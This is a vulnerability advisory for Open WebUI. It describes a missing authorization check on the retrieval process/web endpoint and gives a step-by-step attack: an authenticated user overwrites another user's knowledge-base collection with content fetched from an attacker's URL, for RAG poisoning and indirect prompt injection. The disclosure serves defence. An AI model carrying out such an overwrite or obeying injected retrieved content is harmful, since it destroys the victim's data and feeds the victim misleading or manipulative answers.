Improper authorization control for web services In open-webui
Description
Open WebUI has Knowledge Base Destruction and RAG Poisoning via Unauthorized Collection Overwrite
Knowledge Base Destruction and RAG Poisoning via Unauthorized Collection Overwrite
Affected Component
Retrieval web/YouTube processing endpoints:
backend/open_webui/routers/retrieval.py (lines 1810-1837, process_web)
backend/open_webui/routers/retrieval.py (the parallel process_youtube endpoint)
backend/open_webui/routers/retrieval.py (line 1445, save_docs_to_vector_db call chain)
Affected Versions
Current main branch (commit 6fdd19bf1) and likely all versions with RAG/knowledge base functionality.
Description
The POST /api/v1/retrieval/process/web endpoint accepts a user-supplied collection_name and an overwrite query parameter (default: True). It performs no authorization check on whether the calling user owns or has write access to the target collection. When overwrite=True, save_docs_to_vector_db calls VECTOR_DB_CLIENT.delete_collection() on the target collection before writing new content.
Combined with the knowledge base enumeration vulnerability (separate report), an attacker can trivially discover any user's knowledge base UUID and then destroy or poison it.
# retrieval.py:1810-1837 — no collection authorization check @router.post('/process/web') async def process_web( request: Request, form_data: ProcessUrlForm, user=Depends(get_verified_user), ... ):...
CVSS 3.1 Breakdown
Metric | Value | Rationale |
|---|---|---|
Attack Vector | Network (N) | Exploited remotely via API call |
Attack Complexity | Low (L) | Single API call with a known KB UUID |
Privileges Required | Low (L) | Requires any authenticated user account |
User Interaction | None (N) | No victim interaction required |
Scope | Unchanged (U) | Impact within the knowledge base authorization boundary |
Confidentiality | None (N) | No data disclosure from this vulnerability directly |
Integrity | High (H) | Complete replacement of victim's KB content with attacker-controlled data |
Availability | High (H) | Victim's original KB embeddings are deleted; KB effectively destroyed |
Attack Scenario
Attacker discovers victim's KB UUID via the knowledge-bases meta-collection (separate finding) or other enumeration.
Attacker sends:
POST /api/v1/retrieval/process/web?overwrite=true { "url": "https://attacker.com/poison", "collection_name": "<victim_kb_uuid>" }
The endpoint fetches content from the attacker's URL.
save_docs_to_vector_db deletes the entire vector collection belonging to the victim's knowledge base.
The attacker's fetched content is embedded and written as the new collection content.
Victim's RAG queries against their KB now return attacker-controlled content instead of their original documents.
Impact
Data destruction: Victim's original KB embeddings are permanently deleted from the vector store
RAG poisoning: Attacker-controlled content replaces legitimate knowledge, causing the LLM to return misleading or malicious answers to the victim
Indirect prompt injection: Poisoned content can contain crafted prompts that manipulate the victim's LLM behavior when queried
Persistence: The poisoned content persists until the KB is rebuilt from source files
Preconditions
Attacker must have a valid user account
Attacker must know the target collection name (KB UUID) — easily obtained via the knowledge-bases enumeration finding
Mitigation
Update Impact
Minimal update. May introduce new vulnerabilities or breaking changes.
Ecosystem | Package | Affected version | Patched versions |
|---|---|---|---|
pypi | open-webui | 0.9.0 |
Aliases
References